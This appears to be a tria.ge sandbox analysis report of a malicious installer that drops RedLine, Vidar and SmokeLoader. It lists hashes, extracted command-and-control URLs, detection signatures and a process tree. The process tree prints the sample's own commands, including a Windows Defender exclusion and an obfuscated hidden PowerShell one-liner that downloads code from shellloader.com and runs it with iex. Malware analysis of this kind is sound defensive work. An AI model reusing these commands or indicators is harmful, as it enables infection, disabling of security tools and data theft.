Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
07/09/2021, 17:26
210907-vzzaxsdae6 1007/09/2021, 13:18
210907-qkaa2acfe3 1006/09/2021, 17:52
210906-wfz9jsbch4 1006/09/2021, 17:51
210906-wfnwhsbch3 1006/09/2021, 13:27
210906-qp3hdaedaj 1006/09/2021, 09:28
210906-lfpgyaeael 1006/09/2021, 04:33
210906-e6mmpsaaa2 1005/09/2021, 05:25
210905-f4h26sfab6 1004/09/2021, 21:32
210904-1dqdsahfdj 1004/09/2021, 21:19
210904-z56z6shfck 10Analysis
-
max time kernel
18s -
max time network
96s -
platform
windows10_x64 -
resource
win10-fr -
submitted
04/09/2021, 21:19
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
2.2MB
-
MD5
e3b3a95ef03de0de77cca7a54ea22c94
-
SHA1
d318d234f8f27f25de660d9881113df9d11c24ff
-
SHA256
baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15
-
SHA512
3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
vidar
40.4
706
https://romkaxarit.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2696 3032 rundll32.exe 8 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4984 3032 rundll32.exe 8 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral8/memory/4768-238-0x00000000014A0000-0x00000000014CE000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral8/memory/4228-275-0x0000000003E20000-0x0000000003EF3000-memory.dmp family_vidar behavioral8/memory/4228-311-0x0000000000400000-0x00000000021BE000-memory.dmp family_vidar -
resource yara_rule behavioral8/files/0x000400000001ab17-123.dat aspack_v212_v242 behavioral8/files/0x000400000001ab17-125.dat aspack_v212_v242 behavioral8/files/0x000400000001ab16-124.dat aspack_v212_v242 behavioral8/files/0x000400000001ab16-129.dat aspack_v212_v242 behavioral8/files/0x000400000001ab16-130.dat aspack_v212_v242 behavioral8/files/0x000500000001ab19-128.dat aspack_v212_v242 behavioral8/files/0x000500000001ab19-131.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 9 IoCs
pid Process 2748 setup_installer.exe 3752 setup_install.exe 4192 Fri157e25afd971.exe 4204 Fri156ec98815f89c.exe 4216 Fri155442fc38b.exe 4228 Fri1544861ac3fe6a.exe 4356 Fri157e25afd971.tmp 4380 Fri15af75ee9b.exe 4388 Fri1553f0ee90.exe -
Loads dropped DLL 6 IoCs
pid Process 3752 setup_install.exe 3752 setup_install.exe 3752 setup_install.exe 3752 setup_install.exe 3752 setup_install.exe 3752 setup_install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
pid pid_target Process procid_target 4748 4228 WerFault.exe 97 4720 5076 WerFault.exe 108 5468 4228 WerFault.exe 97 5056 4228 WerFault.exe 97 5508 4228 WerFault.exe 97 6128 4160 WerFault.exe 110 4432 4228 WerFault.exe 97 5164 4160 WerFault.exe 110 4540 4228 WerFault.exe 97 6032 4160 WerFault.exe 110 5592 4228 WerFault.exe 97 4328 4160 WerFault.exe 110 5184 4160 WerFault.exe 110 6108 4228 WerFault.exe 97 4248 4160 WerFault.exe 110 5732 4160 WerFault.exe 110 4784 4228 WerFault.exe 97 5184 4228 WerFault.exe 97 5252 4228 WerFault.exe 97 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4388 Fri1553f0ee90.exe Token: SeDebugPrivilege 4216 Fri155442fc38b.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2256 wrote to memory of 2748 2256 setup_x86_x64_install.exe 82 PID 2256 wrote to memory of 2748 2256 setup_x86_x64_install.exe 82 PID 2256 wrote to memory of 2748 2256 setup_x86_x64_install.exe 82 PID 2748 wrote to memory of 3752 2748 setup_installer.exe 83 PID 2748 wrote to memory of 3752 2748 setup_installer.exe 83 PID 2748 wrote to memory of 3752 2748 setup_installer.exe 83 PID 3752 wrote to memory of 2228 3752 setup_install.exe 86 PID 3752 wrote to memory of 2228 3752 setup_install.exe 86 PID 3752 wrote to memory of 2228 3752 setup_install.exe 86 PID 3752 wrote to memory of 3788 3752 setup_install.exe 87 PID 3752 wrote to memory of 3788 3752 setup_install.exe 87 PID 3752 wrote to memory of 3788 3752 setup_install.exe 87 PID 3752 wrote to memory of 3200 3752 setup_install.exe 88 PID 3752 wrote to memory of 3200 3752 setup_install.exe 88 PID 3752 wrote to memory of 3200 3752 setup_install.exe 88 PID 3752 wrote to memory of 3932 3752 setup_install.exe 89 PID 3752 wrote to memory of 3932 3752 setup_install.exe 89 PID 3752 wrote to memory of 3932 3752 setup_install.exe 89 PID 3752 wrote to memory of 1540 3752 setup_install.exe 90 PID 3752 wrote to memory of 1540 3752 setup_install.exe 90 PID 3752 wrote to memory of 1540 3752 setup_install.exe 90 PID 3752 wrote to memory of 792 3752 setup_install.exe 91 PID 3752 wrote to memory of 792 3752 setup_install.exe 91 PID 3752 wrote to memory of 792 3752 setup_install.exe 91 PID 3752 wrote to memory of 4116 3752 setup_install.exe 94 PID 3752 wrote to memory of 4116 3752 setup_install.exe 94 PID 3752 wrote to memory of 4116 3752 setup_install.exe 94 PID 2228 wrote to memory of 4128 2228 cmd.exe 93 PID 2228 wrote to memory of 4128 2228 cmd.exe 93 PID 2228 wrote to memory of 4128 2228 cmd.exe 93 PID 3752 wrote to memory of 4144 3752 setup_install.exe 92 PID 3752 wrote to memory of 4144 3752 setup_install.exe 92 PID 3752 wrote to memory of 4144 3752 setup_install.exe 92 PID 3932 wrote to memory of 4192 3932 cmd.exe 95 PID 3932 wrote to memory of 4192 3932 cmd.exe 95 PID 3932 wrote to memory of 4192 3932 cmd.exe 95 PID 3200 wrote to memory of 4204 3200 cmd.exe 96 PID 3200 wrote to memory of 4204 3200 cmd.exe 96 PID 3200 wrote to memory of 4204 3200 cmd.exe 96 PID 1540 wrote to memory of 4216 1540 cmd.exe 98 PID 1540 wrote to memory of 4216 1540 cmd.exe 98 PID 3788 wrote to memory of 4228 3788 cmd.exe 97 PID 3788 wrote to memory of 4228 3788 cmd.exe 97 PID 3788 wrote to memory of 4228 3788 cmd.exe 97 PID 4192 wrote to memory of 4356 4192 Fri157e25afd971.exe 99 PID 4192 wrote to memory of 4356 4192 Fri157e25afd971.exe 99 PID 4192 wrote to memory of 4356 4192 Fri157e25afd971.exe 99 PID 792 wrote to memory of 4380 792 cmd.exe 101 PID 792 wrote to memory of 4380 792 cmd.exe 101 PID 792 wrote to memory of 4380 792 cmd.exe 101 PID 4144 wrote to memory of 4388 4144 cmd.exe 100 PID 4144 wrote to memory of 4388 4144 cmd.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:4128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri1544861ac3fe6a.exeFri1544861ac3fe6a.exe5⤵
- Executes dropped EXE
PID:4228 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 7646⤵
- Program crash
PID:4748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 8006⤵
- Program crash
PID:5468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 7886⤵
- Program crash
PID:5056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 8326⤵
- Program crash
PID:5508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 9606⤵
- Program crash
PID:4432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 9886⤵
- Program crash
PID:4540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 10206⤵
- Program crash
PID:5592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 14246⤵
- Program crash
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 13966⤵
- Program crash
PID:4784
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 16126⤵
- Program crash
PID:5184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 14406⤵
- Program crash
PID:5252
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri156ec98815f89c.exeFri156ec98815f89c.exe5⤵
- Executes dropped EXE
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri157e25afd971.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri157e25afd971.exeFri157e25afd971.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\is-A3AA8.tmp\Fri157e25afd971.tmp"C:\Users\Admin\AppData\Local\Temp\is-A3AA8.tmp\Fri157e25afd971.tmp" /SL5="$50050,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri157e25afd971.exe"6⤵
- Executes dropped EXE
PID:4356 -
C:\Users\Admin\AppData\Local\Temp\is-LSATL.tmp\zab2our.exe"C:\Users\Admin\AppData\Local\Temp\is-LSATL.tmp\zab2our.exe" /S /UID=burnerch27⤵PID:4724
-
C:\Program Files\Mozilla Firefox\MKHZYIARBF\ultramediaburner.exe"C:\Program Files\Mozilla Firefox\MKHZYIARBF\ultramediaburner.exe" /VERYSILENT8⤵PID:5456
-
C:\Users\Admin\AppData\Local\Temp\is-CF07B.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-CF07B.tmp\ultramediaburner.tmp" /SL5="$301E4,281924,62464,C:\Program Files\Mozilla Firefox\MKHZYIARBF\ultramediaburner.exe" /VERYSILENT9⤵PID:6016
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:4884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\00-f6420-1e7-c0180-2f99953b5b1e9\ZHutehipyce.exe"C:\Users\Admin\AppData\Local\Temp\00-f6420-1e7-c0180-2f99953b5b1e9\ZHutehipyce.exe"8⤵PID:5756
-
-
C:\Users\Admin\AppData\Local\Temp\69-a3ddb-02d-ac68f-2e934c3c888fd\Qucetaepatae.exe"C:\Users\Admin\AppData\Local\Temp\69-a3ddb-02d-ac68f-2e934c3c888fd\Qucetaepatae.exe"8⤵PID:5968
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri155442fc38b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri155442fc38b.exeFri155442fc38b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4216 -
C:\Users\Admin\AppData\Roaming\5469306.exe"C:\Users\Admin\AppData\Roaming\5469306.exe"6⤵PID:4624
-
-
C:\Users\Admin\AppData\Roaming\2293519.exe"C:\Users\Admin\AppData\Roaming\2293519.exe"6⤵PID:4708
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:4308
-
-
-
C:\Users\Admin\AppData\Roaming\8705625.exe"C:\Users\Admin\AppData\Roaming\8705625.exe"6⤵PID:4768
-
-
C:\Users\Admin\AppData\Roaming\8601841.exe"C:\Users\Admin\AppData\Roaming\8601841.exe"6⤵PID:4492
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri15af75ee9b.exeFri15af75ee9b.exe5⤵
- Executes dropped EXE
PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Users\Admin\AppData\Local\Temp\7zSCBA3DAC3\Fri1553f0ee90.exeFri1553f0ee90.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4388 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:4612
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:4876
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:4980
-
C:\Users\Admin\AppData\Roaming\7581388.exe"C:\Users\Admin\AppData\Roaming\7581388.exe"8⤵PID:4392
-
-
C:\Users\Admin\AppData\Roaming\8724782.exe"C:\Users\Admin\AppData\Roaming\8724782.exe"8⤵PID:2120
-
-
C:\Users\Admin\AppData\Roaming\6857957.exe"C:\Users\Admin\AppData\Roaming\6857957.exe"8⤵PID:2672
-
-
C:\Users\Admin\AppData\Roaming\3324617.exe"C:\Users\Admin\AppData\Roaming\3324617.exe"8⤵PID:5812
-
-
C:\Users\Admin\AppData\Roaming\3830901.exe"C:\Users\Admin\AppData\Roaming\3830901.exe"8⤵PID:5168
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:5076
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5076 -s 15688⤵
- Program crash
PID:4720
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:4160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 1888⤵
- Program crash
PID:6128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 8328⤵
- Program crash
PID:5164
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 8808⤵
- Program crash
PID:6032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 9008⤵
- Program crash
PID:4328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 10008⤵
- Program crash
PID:5184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 10048⤵
- Program crash
PID:4248
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 11008⤵
- Program crash
PID:5732
-
-
-
C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"7⤵PID:4044
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\is-926JJ.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-926JJ.tmp\setup_2.tmp" /SL5="$10204,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:4888
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:1164
-
C:\Users\Admin\AppData\Local\Temp\is-36AQT.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-36AQT.tmp\setup_2.tmp" /SL5="$20218,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\is-I4PUU.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-I4PUU.tmp\postback.exe" ss111⤵PID:5388
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:5544
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"13⤵PID:4456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"14⤵PID:4512
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:4756
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:5068
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:3172
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:5224
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c APPNAME7.exe4⤵PID:4116
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2696 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5160
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5448
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4984 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4812
-